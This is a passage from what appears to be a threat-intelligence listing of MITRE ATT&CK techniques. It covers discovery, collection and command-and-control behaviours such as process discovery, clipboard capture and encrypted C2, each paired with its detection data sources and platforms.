Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre